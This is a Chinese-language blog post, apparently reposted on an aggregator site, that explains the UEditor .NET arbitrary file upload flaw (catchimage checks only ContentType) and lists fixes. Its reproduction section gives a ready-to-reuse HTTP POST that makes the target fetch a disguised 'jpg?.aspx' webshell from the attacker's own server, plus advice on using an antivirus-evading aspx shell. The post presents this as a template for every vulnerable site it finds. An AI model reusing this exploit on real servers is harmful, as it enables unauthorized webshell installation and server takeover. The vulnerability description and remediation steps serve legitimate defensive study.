UEditor 任意文件上傳漏洞

前言

前段時間在做某政府單位的項目的時候發(fā)現(xiàn)存在該漏洞，雖然是一個老洞，但這也是容易被忽視，且能快速拿到shell的漏洞，在利用方式上有一些不一樣的心得，希望能幫助到一些還不太了解的小伙伴，故此寫了此篇文章。

一、 漏洞簡介

1.1 漏洞描述

Ueditor是百度開發(fā)的一個網(wǎng)站編輯器，目前已經(jīng)不對其進(jìn)行后續(xù)開發(fā)和更新，該漏洞只存在于該編輯器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影響，.net存在任意文件上傳，繞過文件格式的限制，在獲取遠(yuǎn)程資源的時候并沒有對遠(yuǎn)程文件的格式進(jìn)行嚴(yán)格的過濾與判斷。

1.2 影響范圍

該漏洞影響UEditor的.Net版本，其它語言版本暫時未受影響。

1.3 漏洞原理

漏洞的成因是在獲取圖片資源時僅檢查了ContentType，導(dǎo)致可以繞過達(dá)到任意文件上傳。

1.4 漏洞修復(fù)

1.修改工程目錄下net/App_Code/CrawlerHandler.cs文件，添加對文件類型檢查的代碼。
2.使用各類WAF軟件，防止攻擊者上傳惡意文件。
3.檢查文件上傳路徑下是否有近期上傳的畸形圖片；檢查是否存在asp，aspx等類型危險文件。如果發(fā)現(xiàn)異常文件，請判斷后及時刪除。

二、漏洞復(fù)現(xiàn)

首先

我們進(jìn)入到該系統(tǒng)的后臺，通過挨個功能點的查看最終再此位置發(fā)現(xiàn)了一個Ueditor的編輯器。

第一步：

驗證碼漏洞是否存在：拼接漏洞URL地址：
UEditor/net/controller.ashx?action=catchimage

顯示{“state”:”參數(shù)錯誤：沒有指定抓取源”}，就基本可以繼續(xù)嘗試漏洞利用

第二步：漏洞利用

1、先談一下部分人可能存在的誤區(qū)

例如：很多小伙伴當(dāng)看網(wǎng)上文章的時候，看到要構(gòu)造寫一個HTML的文件上傳腳本，需要把自己服務(wù)器上的圖片碼上傳到漏洞站點的時候。

第一種：有些不太了解的小伙伴在網(wǎng)上看到一些以下位置的復(fù)現(xiàn)報告的時候，有的就會說Windows系統(tǒng)沒法命名文件帶?號的，比如：xxx.jpg?.aspx 格式的。

第二種：我沒有Linux服務(wù)器怎么辦，沒法在Windows系統(tǒng)的服務(wù)器上用這種帶問號？格式的文件怎么辦，之類這樣的困惑。

很多小伙伴就還真被誤導(dǎo)進(jìn)去了。

1.1 誤區(qū)解惑

網(wǎng)上很多文章并沒有詳細(xì)說明一些看似簡單的方法步驟，但卻有時候會容易讓不太了解的人，產(chǎn)生誤導(dǎo)。

這里我來詳細(xì)解惑：
重點：
第一點：就是直接用圖片碼哪怕不需要圖片碼內(nèi)容繞過的都可以，有時候直接一個稍微免殺的aspx的碼改為jpg格式都行。最終示個人遇到的實際情況而定。
第二點：不需要用到Linux服務(wù)器，直接Windows服務(wù)器即可。

從上圖實踐中可以看出，哪怕是Linux系統(tǒng)類型的服務(wù)器，你用格式為：xxx.jpg?.aspx 的文件上傳也是不行的，哪怕你的服務(wù)器目錄存在該文件，也會顯示404

正確成功的方法

下圖可以看到上傳成功返回上傳的路徑

2、這里我個人經(jīng)驗常用推薦使用的方法：

（墻裂推薦大家，或者嫌麻煩想省事的朋友使用）

2.1 個人推薦：數(shù)據(jù)包構(gòu)造法

原因：當(dāng)你用網(wǎng)上很多寫用什么HTML文件的方式上傳，抓包你會發(fā)現(xiàn)其實上傳的數(shù)據(jù)包是這樣的。

由此我們可以換個思路想到，為何不直接用該數(shù)據(jù)包呢，以后每次遇到該編輯器漏洞，都可嘗試用該數(shù)據(jù)包修改部分內(nèi)容即可直接使用。方便又快捷。

通用數(shù)據(jù)包：

POST /替換漏洞URL地址拼接/UEditor/net/controller.ashx?action=catchimage HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="100", "Chromium";v="100", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

source[]=http://替換為自己服務(wù)器開啟http服務(wù)的URL地址/666.jpg?.aspx

最后上傳成功，Getshell

該編輯器還有其他漏洞如SSRF，存儲型xss等，這里就不在過多贅述，感興趣的小伙伴可自行網(wǎng)上搜索嘗試。

該類型漏洞現(xiàn)在還是有不少，只要細(xì)心去發(fā)現(xiàn)。
希望此篇文章對大家能有所幫助，覺得對你有所幫助的小伙伴，可以評論加點贊！
謝謝！

?申明：本賬號所分享內(nèi)容僅用于網(wǎng)絡(luò)安全技術(shù)討論，切勿用于違法途徑，所有滲透都需獲取授權(quán)，違者后果自行承擔(dān)，與本號及作者無關(guān)，請謹(jǐn)記守法。

免費領(lǐng)取安全學(xué)習(xí)資料包！

滲透工具

技術(shù)文檔、書籍

?

面試題

幫助你在面試中脫穎而出

視頻

基礎(chǔ)到進(jìn)階

環(huán)境搭建、HTML，PHP，MySQL基礎(chǔ)學(xué)習(xí)，信息收集，SQL注入,XSS，CSRF，暴力破解等等

?

應(yīng)急響應(yīng)筆記

學(xué)習(xí)路線

文章來源地址http://www.zghlxwxcb.cn/news/detail-858859.html

到了這里，關(guān)于實戰(zhàn)紀(jì)實 | 編輯器漏洞之Ueditor-任意文件上傳漏洞 （老洞新談）的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！